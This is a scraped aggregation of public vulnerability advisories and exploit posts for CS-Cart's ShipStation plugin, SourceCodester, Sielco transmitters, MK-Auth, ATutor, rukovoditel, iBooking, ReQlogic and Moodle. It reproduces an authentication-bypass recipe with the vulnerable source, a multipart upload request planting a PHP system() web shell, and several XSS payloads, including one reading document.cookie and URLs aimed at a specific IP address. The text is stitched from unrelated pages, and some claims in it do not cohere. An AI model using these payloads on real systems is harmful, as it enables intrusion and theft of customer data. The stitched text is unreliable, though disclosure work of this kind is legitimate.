The ShipStation.com plugin 1.0 for CS-Cart allows remote attackers to obtain sensitive information (via action=export) because a typo results in a successful comparison of a blank password and NULL.

Description:

The ShipStation.com plugin 1.0 for CS-Cart allows remote attackers to obtain sensitive information (via action=export) because a typo results in a successful comparison of a blank password and NULL.

Additional information:

Multiple access bypass vulnerabilities in the file named shipstation.php, with trigger points at line 36 as well as line 31 and as explained in more detail below, in the ShipStation.com CS-Cart plugin 1.0 allow remote attackers to access sensitive user and purchase data from a CS-Cart installation via accessing the front page of the store with approximately four key/value pairs appended to the query string of the URL: "dispatch=shipstation", "action=export", "start\_date=START\_DATE\_HERE", and "end\_date=END\_DATE\_HERE", where START\_DATE\_HERE and END\_DATE\_HERE are replaced with a date readable by PHP's strtotime() function. Trigger point specifics as previously referenced are as follows. (1) Line 36 of shipstation.php seeks to deny access by way of comparing the remote username and the remote password each to its respective counterpart as stored in the CS-Cart database; however instead of validating whether either of those exclusive values are not a match (thereby denying access in either case), line 36 denies access only when both the remote username does not match the local username and when the remote password does not match the local password. In other words, if either one is a mismatch then access is not denied. (2) Line 36 of shipstation.php does utilize strict type comparison operators during authentication, the importance of which being explained shortly hereafter. (3) Line 31 of shipstation.php attempts to retrieve a password value from CS-Cart's registry whose key is "addons.shipstations.password". However, while this is a simple typo ("shipstations" instead of "shipstation"), the result is that said registry key's value becomes unretrievable since it is unable to be set from anywhere within the administrative control panel, and its returned value will always be NULL. Further, since that same value is later used on line 36 for comparison to the remote password for authentication purposes, even if numbers 1 and 2 as described above were non-existent, a remote attacker could still bypass access restrictions by providing an empty string as the remote password since an empty string and NULL would technically match each other in PHP since strict type comparison operators are not utilized here.

Solution:

This advisory only applies to the plugin which was previously provided directly by ShipStation's UI. The plugin has since been moved to Github.  
For users who obtained the plugin directly from the ShipStation UI, install version 1.0.10 which is now hosted on Github at https://github.com/shipstation/plugin-cs-cart.

Original source code:

<?php
/\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*
\*                                                                          \*
\*   (c) 2004 Vladimir V. Kalynyak, Alexey V. Vinokurov, Ilya M. Shalnev    \*
\*                                                                          \*
\* This  is  commercial  software,  only  users  who have purchased a valid \*
\* license  and  accept  to the terms of the  License Agreement can install \*
\* and use this program.                                                    \*
\*                                                                          \*
\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*
\* PLEASE READ THE FULL TEXT  OF THE SOFTWARE  LICENSE   AGREEMENT  IN  THE \*
\* "copyright.txt" FILE PROVIDED WITH THIS DISTRIBUTION PACKAGE.            \*
\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*/

header('Content-Type: text/xml');

if (!defined('BOOTSTRAP')) { die('Access denied'); }

use Tygh\\Registry;
$action = strtolower($\_REQUEST\['action'\]);

$post\_data = '';

if ($action == 'export') {

    $username = empty($\_SERVER\['PHP\_AUTH\_USER'\]) ? $\_SERVER\['HTTP\_SS\_AUTH\_USER'\] : $\_SERVER\['PHP\_AUTH\_USER'\];
    $password = empty($\_SERVER\['PHP\_AUTH\_PW'\]) ? $\_SERVER\['HTTP\_SS\_AUTH\_PW'\] : $\_SERVER\['PHP\_AUTH\_PW'\];
    
    //if (empty($\_REQUEST\['vendor'\]) || !fn\_allowed\_for('MULTIVENDOR')) {
        $addon\_username = Registry::get('addons.shipstation.username');
        $addon\_password = Registry::get('addons.shipstations.password');
    //} elseif (fn\_allowed\_for('MULTIVENDOR')) {
        //list($addon\_username, $addon\_password) = db\_get\_row("SELECT shipstation\_username, shipstation\_password FROM ?:companies WHERE company\_id = ?i", $\_REQUEST\['vendor'\]);
    //}
    
    if ($username != $addon\_username && $password != $addon\_password) {
        die('Access denied - Wrong username or password');
    }

    if (isset($\_REQUEST\['start\_date'\])) {
        $start\_date = $\_REQUEST\['start\_date'\];
    }

    if (isset($\_REQUEST\['end\_date'\])) {
        $end\_date = $\_REQUEST\['end\_date'\];
    }

    $page = empty($\_REQUEST\['page'\]) ? 1 : $\_REQUEST\['page'\];
    $items\_per\_page = Registry::get('settings.Appearance.admin\_orders\_per\_page');
    $limit = db\_paginate($page, $items\_per\_page);
    $condition = " AND is\_parent\_order != 'Y'";
    $condition .= db\_quote(" AND ((timestamp >= ?i AND timestamp <= ?i) OR (last\_modify != 0 AND last\_modify >= ?i AND last\_modify <= ?i))", strtotime($start\_date), strtotime($end\_date), strtotime($start\_date), strtotime($end\_date));
    if (fn\_allowed\_for('MULTIVENDOR') && !empty($\_REQUEST\['vendor'\])) {
        $condition .= db\_quote(" AND company\_id = ?i ", $\_REQUEST\['vendor'\]);
    }

    $order\_ids = db\_get\_fields("SELECT order\_id FROM ?:orders "
                                . " WHERE 1 $condition  $limit");
                                
    $total = db\_get\_field("SELECT COUNT(DISTINCT(order\_id)) FROM ?:orders WHERE 1 $condition");
    $total\_pages = ceil(($total \* 1.0)/ $items\_per\_page);
                                
    $post\_data = fn\_shipstation\_xml\_header();
    
    $post\_data .= fn\_shipstation\_add\_tag("Orders", ($total\_pages > 1 && $page == 1 ? array('pages' => $total\_pages) : array())); // TODO split to pages
    
    foreach ($order\_ids as $order\_id) {
        $post\_data .= fn\_shipstation\_add\_order($order\_id);
    }
    $post\_data .= fn\_shipstation\_close\_tag("Orders");
    
} elseif ($action == 'shipnotify') {
    $body = '';
    $fh   = @fopen('php://input', 'r');
    if ($fh) {
        while (!feof($fh)) {
            $s = fread($fh, 1024);
            if (is\_string($s)) {
                $body .= $s;
            }
        }
        fclose($fh);
    }
    $order\_id = $\_REQUEST\['order\_number'\];
    
    $tracking\_number = $\_REQUEST\['tracking\_number'\];

    if (empty($order\_id) || empty($tracking\_number)) {
        header("HTTP/1.0 404", true, 404);
        exit;
    } else {
        $order\_info = fn\_get\_order\_info($order\_id);
        if (!empty($order\_info)) { 
            $products = $order\_info\['products'\];
            
            $order\_shipments = db\_get\_hash\_array("SELECT sum(amount) as amount, item\_id FROM ?:shipment\_items WHERE order\_id = ?i GROUP BY item\_id", 'item\_id', $order\_id);
            $all\_shipped = true;
            
            foreach ($products as $item\_id => $product) {
                if (isset($order\_shipments\[$item\_id\])) {
                    $order\_amount = $product\['amount'\];
                    $shipped\_amount = $order\_shipments\[$item\_id\]\['amount'\];
                    
                    if (($order\_amount > $shipped\_amount) || ($order\_amount == $shipped\_amount)) {
                        $all\_shipped = false;
                        break;
                    }
                } else {
                    $all\_shipped = false;
                    break;
                }
            }
            
            if ($all\_shipped) {
                header("HTTP/1.0 404", true, 404);
                die('All shipped');
            }
            
            $carriers = fn\_get\_carriers();
            $carrier = '';
            foreach ($carriers as $s\_carrier) {
                if (strtolower($s\_carrier) == strtolower($\_REQUEST\['carrier'\])) {
                    $carrier = $s\_carrier;
                    break;
                }
            }
            
            if (empty($carrier) && !empty($\_carrier)) {
                $carrier = $\_carrier;
            }
            $comments = '';
            $doc = new DomDocument('1.0', 'utf-8');
            $doc->loadXML($body);
            $xp = new DomXPath($doc);
            
            foreach ($xp->query('//NotesToCustomer') as $node) {
                $comments = $node->nodeValue;
            }
            
            foreach ($xp->query('//ShipDate') as $node) {
                $shipdate = $node->nodeValue;
            }

           
            $\_products = array();
            foreach ($xp->query('//Items') as $node) {
                foreach ($node->childNodes as $item) {
                    $amount = 0;
                    $item\_id = 0;
                    foreach ($item->childNodes as $subnode) {
                        if ($subnode->nodeName == 'Quantity') {
                            $amount = $subnode->nodeValue;
                        }
                        if ($subnode->nodeName == 'SKU') {
                            $order\_details = db\_get\_row("SELECT item\_id, amount FROM ?:order\_details WHERE order\_id = ?i AND product\_code = ?s", $order\_id, $subnode->nodeValue);
                            if (!empty($order\_details\['item\_id'\])) {
                                $item\_id = $order\_details\['item\_id'\];
                            }
                        }
                    }
                    if (!empty($item\_id)) {
                        $\_products\[$item\_id\] = $amount;
                    }
                }
            }
    
            $ship\_data = array(
                 'shipping\_id' => $order\_info\['shipping\_ids'\],
                 'tracking\_number' => $tracking\_number,
                 'carrier' => $carrier,
                 'comments' => $comments,
                 'timestamp' => !empty($shipdate) ? strtotime($shipdate) : time()
            );
            
            $shipment\_id = db\_query("INSERT INTO ?:shipments ?e", $ship\_data);

            foreach ($\_products as $key => $amount) {
                if (isset($order\_info\['products'\]\[$key\])) {
                    $amount = intval($amount);
                }

                if ($amount == 0) {
                    continue;
                }
                
                $\_data = array(
                    'item\_id' => $key,
                    'shipment\_id' => $shipment\_id,
                    'order\_id' => $order\_id,
                    'product\_id' => $order\_info\['products'\]\[$key\]\['product\_id'\],
                    'amount' => $amount,
                );
                                                      
                db\_query("INSERT INTO ?:shipment\_items ?e", $\_data);
            }
            $order\_shipments = db\_get\_hash\_array("SELECT sum(amount) as amount, item\_id FROM ?:shipment\_items WHERE order\_id = ?i GROUP BY item\_id", 'item\_id', $order\_id);
            $all\_shipped = true;
            
            foreach ($products as $item\_id => $product) {
                if (isset($order\_shipments\[$item\_id\])) {
                    $order\_amount = $product\['amount'\];
                    $shipped\_amount = $order\_shipments\[$item\_id\]\['amount'\];
                    
                    if ($order\_amount > $shipped\_amount) {
                        $all\_shipped = false;
                        break;
                    }
                } else {
                    $all\_shipped = false;
                    break;
                }
            }
            if ($all\_shipped) {
                $shipped\_status = Registry::get('addons.shipstation.shipped\_statuses');
                if (is\_array($shipped\_status)) {
                    $shipped\_status = reset(array\_keys($shipped\_status));
                    $shipped\_status = str\_replace('status\_', '', $shipped\_status);
                }
                if (empty($shipped\_status)) {
                    $shipped\_status = 'C';
                }
                fn\_change\_order\_status($order\_id, $shipped\_status, '', true);
            }
            header("HTTP/1.0 200", true, 200);
            exit;
        } else {
            header("HTTP/1.0 404", true, 404);
            exit;
        }
        
    }
} else {
    header("HTTP/1.0 200", true, 200);
    exit;
}

echo $post\_data;

exit;

CVE-2020-8889: SA: Shipstation plugin for CS-Cart - Incorrect Access Control

A vulnerability was found in SourceCodester School Registration and Fee System 1.0 and classified as critical. This issue affects some unknown processing of the file /bilal final/login.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224231.

CVE-2023-1674

A vulnerability was found in SourceCodester School Registration and Fee System 1.0. It has been classified as critical. Affected is an unknown function of the file /bilal final/edit_stud.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224232.

CVE-2023-1675

The Cookie session ID 'id' is of an insufficient length and can be exploited by brute force, which may allow a remote attacker to obtain a valid session, bypass authentication and manipulate the transmitter.

Title: Sielco Analog FM Transmitter 2.12 'id' Cookie Brute Force Session Hijacking  
Advisory ID: ZSL-2023-5758  
Type: Local/Remote  
Impact: Security Bypass  
Risk: (4/5)  
Release Date: 28.03.2023

**Summary**

Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China.

**Description**

The Cookie session ID 'id' is of an insufficient length and can be exploited by brute force, which may allow a remote attacker to obtain a valid session, bypass authentication and manipulate the transmitter.

**Vendor**

Sielco S.r.l - https://www.sielco.org

**Affected Version**

2.12 (EXC5000GX)  
2.12 (EXC120GX)  
2.11 (EXC300GX)  
2.10 (EXC1600GX)  
2.10 (EXC2000GX)  
2.08 (EXC1600GX)  
2.08 (EXC1000GX)  
2.07 (EXC3000GX)  
2.06 (EXC5000GX)  
1.7.7 (EXC30GT)  
1.7.4 (EXC300GT)  
1.7.4 (EXC100GT)  
1.7.4 (EXC5000GT)  
1.6.3 (EXC1000GT)  
1.5.4 (EXC120GT)

**Tested On**

lwIP/2.1.1  
Web/3.0.3

**Vendor Status**

\[26.01.2023\] Vulnerability discovered.  
\[27.01.2023\] Contact with the vendor and CSIRT Italia.  
\[27.03.2023\] No response from the vendor.  
\[27.03.2023\] No response from the CSIRT team.  
\[28.03.2023\] Public security advisory released.

**PoC**

sielco\_fm\_sess.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5613.php

**Changelog**

\[28.03.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Sielco Analog FM Transmitter 2.12 'id' Cookie Brute Force Session Hijacking

An arbitrary file upload vulnerability in the Virtual Disk of MK-Auth 23.01K4.9 allows attackers to execute arbitrary code via uploading a crafted .htaccess file.

**IntruderLabs ZirouDei Project**

Date: 2023-05-25

Discoverer: Alan Lacerda (ifundef)

Exploit Coder: Alan Lacerda (ifundef) | Yueslly Lisbooa (0xC4CTU$)

**Vulnerability**

Mk-Auth Remote Command Execution (RCE) via Unrestricted Upload

**Product Description**

Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.

**Vulnerability Description**

It is possible to upload a crafted .htaccess files to the Virtual Disk. This vulnerability may be used to gain Remote Command Execution to the server.

**Additional Information:**

The application does not allow .php files to be uploaded but, by sending a crafted .htaccess an attacker may instruct the server to use php interpreter to any other file extention (even a random one like \*.labs).

**Vulnerability Type:**

CWE-434: Unrestricted Upload of File with Dangerous Type

**Vendor:**

Mk-Auth

**Affected Product:**

MK-Auth <= 23.01K4.9

**Affected Component:**

Virtual Disk

**Attack Vector:**

Remote

**Code Execution:**

Yes

**Attack Vector:**

Any client of the Internet Service Provider that has access to the platform (to download billings and request for support) and has the Virtual Disk feature, may exploit this vulnerability.

**Reference:**

http://mk-auth.com.br/

CVE-2023-27246: 2023-05-25-ziroudei/README.md at main · intruderlabs/2023-05-25-ziroudei

A Cross-site scripting (XSS) vulnerability in the function encrypt_password() in login.tmpl.php in ATutor 2.2.1 allows remote attackers to inject arbitrary web script or HTML via the token parameter.

**Introduction**

While conducting a case study, I discovered a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1. Versions higher than 2.2.1 were also tested and I confirmed that they are not vulnerable to this attack.

**Reflected Cross-Site Scripting (XSS)**

The vulnerability exists in login.tmpl.php and login\_functions.inc.php, and it can be exploited in login.php via a POST request. Login.php accepts a token parameter. The below is partial code in login\_functions.inc.php.

    if (isset($_POST['token']))
    {
        $_SESSION['token'] = $_POST['token'];
    }

The code sets $\_SESSION\[‘token’\] to the submitted value of the token parameter via a POST request. Next is partial code in login.tmpl.php.

    function encrypt_password() {
            document.form.form_password_hidden.value = hex_sha1(hex_sha1(document.form.form_password.value) + "<?php echo $_SESSION['token']; ?>");
            document.form.form_password.value = "";
            return true;
    }

Within the function here, it plainly echoes out a string given to the token parameter.

Figure 1 – Submission of a POST request with the token parameter

Figure 2 – Response to Figure 1 with a reflected value

An input is reflected. It should be tested to check if there is any sanitization for special characters. The same request with a different token **asdf'”!@#$%^&\*)}** was sent.

Figure 3 – Unsanitized reflected value

It can be confirmed that the input is not sanitized at all. With this knowledge, the following payload can be crafted and sent.

    asdf");}alert(1);+function+asdf()+{//

Figure 4 – Response to the request with the payload

The payload successfully closes the function **encrypt\_password()**, injects **alert(1);**, and deinfes a dummy function **asdf()** to close the trailing closing curly bracket. It also comments out the trailing part of the line starting with **hex\_sha1(document**.

Figure 5 – Reflected XSS

It can be confirmed that the payload **alert(1)** successfully executed. This XSS is also possible through cross-site request forgery (CSRF).

Figure 6 – CSRF proof of concept code

Hosting and navigating to this file also resulted in the alert(1) function in the payload being executed.

**Later Versions**

The same attack is confirmed mitigated and not exploitable in later versions. I suspect when other similar attacks were reported to the developers when the web application was actively developed, the prevention mechanism put in place stopped reported attacks, including this seemingly new XSS, altogether.

**Thoughts**

Input sanitization is always an important part of web application development.

**Log**

*   2023-02-16 CVE request was submitted. The author of ATutor was not contacted since ATutor was no longer supported and maintained at the time of the writing.
*   2023-03-28 The vulnerability was assigned CVE-2023-27008 and published.

**Post navigation**

CVE-2023-27008: [CVE-2023-27008] ATutor 2.2.1 Cross-Site Scripting via the Token Body Parameter

rukovoditel version 3.2.1 suffers from a cross site scripting vulnerability.

    ## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)## Author: nu11secur1ty## Date: 11.03.2022## Vendor: https://www.rukovoditel.net/## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1## Description:The application is vulnerable to DOM-based cross-site scriptingattacks. Data is read from `location.hash` and passed to`jQuery.parseHTML`.The attacker can use this vulnerability to create an unlimited numberof accounts on this system until it crashed.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```POSTGET /rukovoditel/index.php?module=users/restore_password HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63Safari/537.36Connection: closeCache-Control: max-age=0Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;cookie_test=please_accept_for_session;app_login_redirect_to=module%3Ddashboard%2FUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/loginSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)## Proof and Exploit:[href](https://streamable.com/i1qmfk)## Time spent`3:45`

rukovoditel 3.2.1 Cross Site Scripting

iBooking version 1.0.8 suffers from a remote shell upload vulnerability.

    # Exploit Title: iBooking v1.0.8 - Arbitrary File Upload# Exploit Author: d1z1n370/oPty# Date: 01/11/2022# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088# Tested on: Linux# Version: 1.0.8# Exploit Description:The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.# PoC request POST https://localhost/dashboard/upload-new-media HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost/dashboard/settingsX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062Content-Length: 449Connection: closeCookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="_token"kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="is_modal"1-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="file"; filename="upload.php56"Content-Type: image/gifGIF89a;<?php system($_GET['a']); phpinfo(); ?>-----------------------------115904534120015298741783774062--

iBooking 1.0.8 Remote Shell Upload

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

**ReQlogic 11.3 Cross Site Scripting**

Posted Mar 28, 2023

Authored by Okan Kurtulus

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2022-41441

SHA-256 | 5227ba88f59a5d4cccd1b7cd664927cd29c2794c9b0bb18836fe0f6ab3662551

Download | Favorite | View

**ReQlogic 11.3 Cross Site Scripting**

    # Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)# Date: 9 October 2022# Exploit Author: Okan Kurtulus# Vendor Homepage: https://reqlogic.com# Version: 11.3# Tested on: Linux# CVE : 2022-41441# Proof of Concept:1- Install ReQlogic v11.32- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=33- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.#XSS Payload:</script><script>alert(1)</script>#Affected PrametersPOBatchWaitDuration#Final URLshttp://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>

**File Tags**

*   ActiveX (932)
*   Advisory (80,599)
*   Arbitrary (15,917)
*   BBS (2,859)
*   Bypass (1,653)
*   CGI (1,022)
*   Code Execution (7,047)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,306)
*   DoS (22,932)
*   Encryption (2,359)
*   Exploit (50,720)
*   File Inclusion (4,180)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,689)
*   Intrusion Detection (876)
*   Java (2,957)
*   JavaScript (830)
*   Kernel (6,449)
*   Local (14,297)
*   Magazine (586)
*   Overflow (12,543)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,502)
*   Python (1,488)
*   Remote (30,282)
*   Root (3,534)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,824)
*   Shell (3,133)
*   Shellcode (1,206)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,171)
*   TCP (2,384)
*   Trojan (687)
*   UDP (880)
*   Virus (663)
*   Vulnerability (31,381)
*   Web (9,467)
*   Whitepaper (3,740)
*   x86 (946)
*   XSS (17,581)
*   Other

**File Archives**

*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (370)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,714)
*   Fedora (1,691)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,130)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,923)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,448)
*   UNIX (9,208)
*   UnixWare (185)
*   Windows (6,532)
*   Other

ReQlogic 11.3 Cross Site Scripting

Moodle LMS version 4.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS)# Date: 26/10/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://moodle.org/# Software Link: https://git.in.moodle.com/moodle# Version: 4.0# Tested on: XAMPP, Windows 10# Contact: https://twitter.com/dmaral3nozDescription:A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public LicenseVulnerable Code:line 111 in file "course/search.php"echo $courserenderer->search_courses($searchcriteria);Steps to exploit:1) Go to http://localhost/course/search.php2) Insert your payload in the "search"Proof of concept (Poc):The following payload will allow you to run the javascript -"><img src=# onerror=alert(document.cookie)>

Tag

#php